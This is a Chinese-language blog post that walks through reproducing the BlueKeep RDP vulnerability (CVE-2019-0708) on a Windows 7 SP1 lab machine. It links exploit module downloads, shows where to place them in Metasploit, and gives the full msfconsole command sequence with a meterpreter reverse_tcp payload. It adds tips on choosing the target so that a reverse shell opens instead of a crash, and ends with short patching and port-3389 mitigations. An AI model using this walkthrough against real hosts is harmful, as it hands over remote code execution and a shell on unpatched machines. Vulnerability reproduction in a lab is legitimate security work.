CVE-2019-0708——反弹shell

0x00 前言

CVE-2019-0708这个漏洞最早爆出是在今年5月份,不过当时这个漏洞POC只能使得目标主机蓝屏,相关文章可以参考我的前一篇文章,然而就在前几天又爆出来可以反弹shell的exp,下面我就又双叒叕来复现一下啦。

目前漏洞影响范围:Windows 7 sp1 or 2008 R2

0x01 环境准备

镜像:Windows 7 sp1 (链接: https://pan.baidu.com/s/1GaD8DCFempeQ1AyroaND8g 提取码: 3ivg)
Exp:链接:https://pan.baidu.com/s/1sw2UaJ1uyYD6WSL7ACTIBw 提取码:ae0a

1.安装镜像,并开启远程桌面
CVE-2019-0708——反弹shell_第1张图片

2.配置msf,将exp放置到msf对应文件夹下,如果同名直接覆盖(这里以kali为例,其他则选择metasploit-framework相对应的安装目录)

rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

0x02 漏洞复现

root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.183.136
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

CVE-2019-0708——反弹shell_第2张图片

注意事项

  1. target是主机架构选择的意思,使用show targets可查看相关选项,这里必须要选择正确,否则会导致目标机器蓝屏。这里可以先试试2再试试3。(PS:这里我虽然用的是VMware可是选3会使得目标蓝屏,选2才能反弹shell,反弹shell比较慢至少要十几秒)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
  Id  Name
  --  ----
  0   Automatic targeting via fingerprinting
  1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
  2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
  3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
  4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
  1. 靶机最好重新安装一台Windows 7 sp1,并允许任何人登录。(PS:我用我之前老的win 7 sp1没有反弹,重新安装以后才测试成功)

0x03 漏洞修复

  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

你可能感兴趣的:(漏洞攻击,漏洞)